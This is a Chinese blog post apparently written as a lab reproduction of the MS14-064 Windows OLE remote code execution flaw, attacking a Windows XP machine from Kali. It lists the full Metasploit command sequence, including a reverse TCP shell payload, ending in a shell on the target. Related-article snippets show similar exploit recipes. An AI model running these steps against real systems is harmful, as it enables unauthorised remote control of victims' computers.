MS14-064(OLE远程代码执行)漏洞复现

已于 2023-06-23 23:28:45 修改
阅读量351 收藏 2
点赞数
文章标签: 安全
于 2023-06-23 19:30:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73263892/article/details/131350895
版权

MicrosoftWindowsOLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3——Win10+IE11全版本。

一  实验环境

 靶机:windows xp

攻击机:kali

二 复现步骤

1  保证两台主机可以ping通

2  进入msfconsole,并查找ms14-064

msfconsole

 search ms14-064

3  使用利用模块  exploit/windows/browser/ms14_064_ole_code_execution

use 0

 使用 默认payload

4  查看选项 

show options

5  设置服务器IP:192.168.2.101(kali的IP地址),允许调用power shell,设置payload

set srvhost 192.168.2.101

set AllowPowershellPrompt true

 set payload windows/shell/reverse_tcp

6  目标的系统默认为windows xp

7  开始攻击

run

8  返回一个链接,并在windows xp的IE浏览器中打开

 

9  输入sessions

10  打开会话

sessions -i 1

11 解决Windows控制台乱码

chcp 65001

 拿到目标主机的反弹shell

FDH~
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Go-go-ole-golang的Win32OLE实现
08-14
go-ole - golang的Win32 OLE实现
MS14-064/CVE-2014-6332漏洞复现OLE远程代码执行漏洞、IE浏览器漏洞
m0_74168970的博客
04-24 311
MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution,主要利用IE浏览器漏洞,Microsoft Windows OLE远程代码执行漏洞OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用Internet Explorer浏览器查看该网站的时允许远程执行代码。show options:查看需要设置的地方。
MS14-064(OLE远程代码执行漏洞复现)
Martin-share的博客
02-11 2212
MS14-064(OLE远程代码执行漏洞复现)
渗透攻击之ms14-064漏洞利用实验
wylululu的博客
01-07 7912
ms14-064简介 Microsoft Windows OLE远程代码执行漏洞OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 –Win10+IE11全版本。 实验步骤: 第一步:打开已安装好的kaili虚拟机系统,显示界面: 第二步:单击打开metasploit framework或者点击左上角应用程序&...
漏洞复现】RTF URL Moniker 的逻辑漏洞 | OLE2Link 漏洞(CVE-2017-0199)
VI___
01-07 1469
一、CVE-2017-0199——类型:OLE对象中的逻辑漏洞 原理:漏洞利用 OFFICEOLE 对象链接技术,将恶意链接对象嵌入在文档中,之后调用 URLMoniker 将恶意链接中的 HTA 文件下载到本地,URLMoniker 通过识别响应头中 content-type 的字段,最终调用 mshta.exe 执行 HTA 文件中的攻击代码。攻击者通过该漏洞可以控制受影响的系统,对受...
MS14-064漏洞复现
kukudeshuo的博客
02-28 6845
MS14-064漏洞复现 摘要 此安全更新可解决 Microsoft Windows 对象链接与嵌入 (OLE) 中 2 个私下报告的漏洞。最严重的漏洞可能在用户使用 Internet Explorer 查看经特殊设计的网页时允许远程执行代码。成功利用这些漏洞的攻击者可以在当前用户的上下文中运行任意代码。如果当前用户使用管理用户权限登录,则攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少用户权限的用户比具有管理用户权限的用户受到的影响要小。 漏洞影响版本
【web安全】深入浅出XSS
kkza的博客
11-04 582
XSS,即跨站脚本攻击,是指攻击者在页面中注入恶意的js代码,并被浏览器执行 分类 反射型 形式:
Office 远程代码执行漏洞 复现
weixin_53696027的博客
06-19 599
Office 远程代码执行漏洞 复现
针对ms14-064模块漏洞的网络渗透实战
skjie的博客
01-11 882
针对ms14-064模块漏洞的网络渗透实战
go-ole:Golang的Win32 ole实现
04-29
OLE 使用共享库而不是cgo为Windows COM进行绑定。 松本康弘。 安装 要试验go-ole,您可以编译并运行示例程序: go get github.com/go-ole/go-ole cd /path/to/go-ole/ go test cd /path/to/go-ole/example/...
opc.rar_OPC-4_ole_opc
09-20
opc-OLE PROCESS on Controll,源码与日本横河工控系统连接,对从业工业控制的同道,具有学习和参考价值
PI-OLEDB-Enterprise_2016_.exe
03-17
连接PI Server 工具
64-Bit OLEDB Provider for ODBC (MSDASQL)
03-14
Microsoft OLE DB Provider for ODBC (MSDASQL) 一项允许在 OLEDB 和 ADO(它在内部使用 OLEDB)上构建的应用程序通过 ODBC 驱动程序访问数据源的技术。 MSDASQL 是用于连接到 ODBC(而不是数据库)的 OLEDB 访问...
漏洞复现MS14-064 OLE远程代码执行漏洞
dingbai2663的博客
09-23 2825
MS14-064OLE远程代码执行漏洞 攻击机:Kali Linux 2019 靶机:Windows 7 x64、x32 攻击步骤: 1.打开攻击机Kali Linux 2019系统和靶机Windows 7系统 2.确定IP地址后,Kali Linux开启msf模块,准备攻击测试 3.在这里我们使用MS14-064OL...
MSF学习笔记(9)
Shadow 爬爬记
12-07 567
利用adobe reader漏洞执行payload 构造pdf文件msf > use exploit/windows/fileformat/adobe_utilprintf msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp msf exploit(adobe_utilprintf) > set
《Metasploit 魔鬼训练营》06 客户端渗透攻击
kevinhanser
11-07 2341
本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程 1. MSF 中自动化浏览器攻击 2. MS11-050 安全漏洞 3. KingView 渗透攻击过程 4.MS10-087 安全漏洞 5. Adoba阅读器渗透攻击案例 1.MSF 中自动化浏览器攻击msf auxiliary(browser_autopwn2) >
MS14-064 漏洞测试入侵win7
aozhuo4755的博客
04-25 1862
Microsoft Windows OLE远程代码执行漏洞OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术, 远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本... metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_executi...
安全生产月”专题报道:AI智能监控技术如何助力安全生产
最新发布
TSINGSEE青犀视频官方技术博客
06-04 923
方案能够通过对人员行为的识别和分析,判断是否存在安全隐患。这些功能的实现,有助于企业提高安全管理水平,减少因人为因素导致的安全事故。
ms14-064漏洞复现停滞在Sending exploit
06-12
首先,MS14-064 是一个由 Microsoft 发布的安全公告,涉及的漏洞编号为 CVE-2014-6324,它存在于 Windows Object Linking and Embedding (OLE) 中,攻击者可以利用该漏洞实现远程执行代码。 如果你想要复现漏洞,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值